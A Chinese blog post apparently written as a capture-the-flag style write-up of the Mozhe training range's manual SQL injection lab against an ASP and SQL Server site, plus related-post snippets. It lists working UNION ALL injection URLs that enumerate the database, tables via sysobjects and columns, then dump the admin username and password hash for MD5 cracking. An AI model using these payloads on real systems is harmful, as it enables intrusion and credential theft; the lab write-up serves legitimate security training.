墨者 - SQL手工注入漏洞测试(Sql Server数据库)

最新推荐文章于 2024-08-14 01:13:59 发布
最新推荐文章于 2024-08-14 01:13:59 发布
阅读量1.9k 收藏 10
点赞数 5
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936434/article/details/94580174
版权

/new_list.asp?id=2 and 1=2  ,返回页面没报错

 

 /new_list.asp?id=2 order by 1 ,测试有多少个字段,知道order by 4还有页面回显

 

这里有个坑,一开始走正常的流程测回显位置 /new_list.asp?id=2 and 1=2  union  select 1,2,3,4  ,

用 union select 连接,页面报错

后来上网搜索才发觉,用union all select 可以成功,所以/new_list.asp?id=2 and 1=2  union all  select 1,2,3,4  ,

一样报错

后来卡了很久才发发现select  1,2,'3',4。这里的3是字符串类型。因为UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每个 SELECT 语句中的列的顺序必须相同。一开始的3是数字类型,数据库的是字符串类型所以一直失败。

改为:/new_list.asp?id=2 and 1=2  union all  select 1,2,'3',4,测到回显位置了

爆库

/new_list.asp?id=2 and 1=2  union all select 1,db_name(),'3',4,名为mozhe_db_v2

爆表

/new_list.asp?id=2 and 1=2  union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),'3',4

这里的mmsql和mysql语法有点不同,mmsql记录敏感信息的表在sysobjects 中。

具体参数可以去这个链接了解:

https://www.cnblogs.com/atree/p/SQL-Server-sysobjects.html

https://blog.csdn.net/jackmacro/article/details/6405871

当xtype='U' 代表是用户建立的表。

 

爆字段

/new_list.asp?id=2 and 1=2  union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),'3',4

这里解释一下col_name(),与object()

object ():数据库中每个对象都有一个唯一的id值,object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的

col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果.

/new_list.asp?id=2 and 1=2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),'3',4  得username

/new_list.asp?id=2 and 1=2  union all select 1,(select top 1 col_name(object_id('manage'),3) from sysobjects),'3',4 得password

说明mange表总共有3列,分别为:id、username、password

 

爆字段内容

/new_list.asp?id=2 and 1=2 union all select 1,(select username from manage),(select password from manage where username in ('admin_mz')),4

MD5在线解密即可得出答案

 

吃肉唐僧
关注
专栏目录
SQL server手工注入入门
无心的博客
10-26 470
目录 0x01 SQL server基础 0x02 基本注入 SQL server部分版本已被黑客安装后门,详情请在文末查看。 0x01 SQL server基础 在学习注入之前,最重要的是要先了解SQL server的具体的东西,才能更好的进行注入操作 系统库 master master数据库控制SQLserver的所有方面,这个数据库中包含所有的配置信息、用户登陆信息、当前正在服务器运行...
sql注入(2) 墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
c10udz的博客
04-12 4172
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
sql server 2008 mysql 手工注入
03-25
本人原创 sql server 2008 mysql 手工注入 里面有源码和数据库文件 还有用于测试的项目
SQL手工注入漏洞测试(Sql Server数据库)
weixin_33853827的博客
01-21 108
还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段。此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL注入。 一、盲注 盲猜爆出表名 通过SQL语句中的a...
若依项目改造-sqlserver(2)
最新发布
weixin_38076674的博客
08-14 156
2、可以在线导出数据库备份bak文件。目前启动时,不需要配置数据库。1、启动时,不用检查数据库连接。3、实现不用配置jdk环境启动。4、实现启动没有控制台窗口。
墨者题解_SQL手工注入漏洞测试(Sql Server数据库)
weixin_43072923的博客
04-14 370
墨者学院——SQL手工注入漏洞测试(Sql Server数据库) 根据背景: 这是一个Sql Server数据库类型的注入靶机,直接启动环境开干。 第一步 使用我们的万金油语句进行判断: id=2 and 1=1 页面正常; id=2 and 1=2 页面异常; id=1 页面异常; id=0 页面异常; id=-1 页面异常; 可以推测SQL语句为:select * from table where id =2 第二步 使用order by 语句进行判断列数: id=2 order by 1.
Sql Server数据库手工注入
内心不种满鲜花就会长满杂草
06-13 5455
目录 Sql Server Sql Server数据库的查询语句 union注入 延时注入 这里感谢墨者学院提供的靶场:https://www.mozhe.cn/bug/detail/90 Sql Server SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 -- 。 QLServer有三个权限级别: sa权限:数据库操作,文件管理,命令执行,注册表读取等system。.
墨者靶场SQL手工注入漏洞测试(Sql Server数据库)
曹振国的博客
06-20 593
Mssql关于SqlServer进入环境:1.寻找注入点:2.查询字段数:3.查询输出点:4.查询库名:5.查询表:6.查询字段:7.查询数据:MD5解码,进入后台拿到key值: 关于SqlServer MSSQL显错注入和MYSQL不太一样: 联合查询,记住要写UNION ALL 然后猜输出点要使用NULL去填充 注释只有-- + 进入环境: 1.寻找注入点: ?id=1 //报错 ?id=2 //正常 2.查询字段数: 有4个字段 ?id=2 and 1=1 order by 4 //正常
墨者学院-SQL注入漏洞测试(报错盲注)
qq_47094508的博客
06-21 335
拿到靶场后访问在用户登陆下方点击关于平台停机维护的通知点击后发现url为 http://124.70.71.251:46004/new_list.php?id=1添加单引号后报错,发现数据库为mariaDB 直接sqlmap一把梭就行了爆库名 爆表名 爆字段名 爆name和password的内容 解密 md5在线解密破解,md5解密加密 登录成功...
墨者靶场 入门:SQL手工注入漏洞测试Sql Server数据库
qq_43233085的博客
01-10 1091
入门:SQL手工注入漏洞测试Sql Server数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Sql Server,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Sql Server的数据结构;...
SQL注入(不同数据库之间)
qi_SJQ_的博客
11-08 1267
简要学习各种数据库注入特点: 数据库:Access, mysql ,mssql(sql server) mongoDB, postgresql, sqlite,oracle, sybase等。 工具:Sqlmap, NoSQLAttack, Pangolin等。 其他数据库大体结构都相同,但access的数据库存在于asp网站内的一个文件夹下,不同网站对应不同数据库。 因此注入方式有所不同,不用注库名,而且没有access数据库没有文件读写功能等等特点。 故有以下结构: ...
SQL手工注入完全篇
09-08
SQL手工注入完全篇
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记
Routine_limon的博客
07-14 310
靶环境:IIS+ASP+Sql Server,Aspx代码对客户端提交的参数未做任何过滤。 解题目标: 手工进行SQL注入测试,获取管理密码登录。 使用sqlmap获取数据库中的表名和字段名;如图: 通过:sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --dbs 获取数据库中的表名 sqlmap.py -u http://2...
SQL Server手工注入方式
内心不种满鲜花就会长满杂草
01-04 6054
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
墨者学院手工sql注入sql server
qq_52074678的博客
03-09 414
1.测试是否存在sql注入 219.153.49.228:47998/new_list.asp?id=2 and 1=1 回显正常 219.153.49.228:47998/new_list.asp?id=2 and 1=2 回显报错 存在SQL注入 2.猜解字段 219.153.49.228:47998/new_list.asp?id=2 order by 4 回显正常 219.153.49.228:47998/new_list.asp?id=2 order by 5 ...
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5176
墨者学院-SQL注入漏洞测试(报错盲注)
墨者 SQL注入漏洞测试(报错盲注)
weixin_50847719的博客
02-09 372
看一下源代码,找到sql注入点 <a href="new_list.php?id=1" target="_blank">关于平台停机维护的通知【12:02】</a></p> 先尝试直接在后面加and 1=2 没用然后试一试http://219.153.49.228:40662/new_list.php?id=1’ 说明是‘’单引号 extractvalue() updatexml()报错注入: extractvalue() :对XML文档进行查询的函数 concat
墨者靶场------SQL注入漏洞测试(报错盲注)
qq_43590351的博客
01-20 748
SQL注入漏洞测试(报错盲注) 自己构造请求参数,然后数据库返回错误的信息,以至于我们能够爆出我们想要的信息 要进行SQL的报错注入,首先要了解MySQL的几个函数 (1)concat 用来连接字符串 select concat('m','y','s','q','l')   执行结果为mysql (2)updatexml 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法
墨者-mssql手工注入
星空下de青铜
05-09 309
发现链接 and 1=1正常 and 1=2错误 ‘ 错误 存在注入 order by 3错误 4正常 5错误 and (select count() from sysobjects) >0 MSSQL and (select count() from msysobjects) >0 ACCESS id =-2 union all select null,null,null,null 4个null 发现2成功回显 看数据库有啥 个人猜测为mozhe_d
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值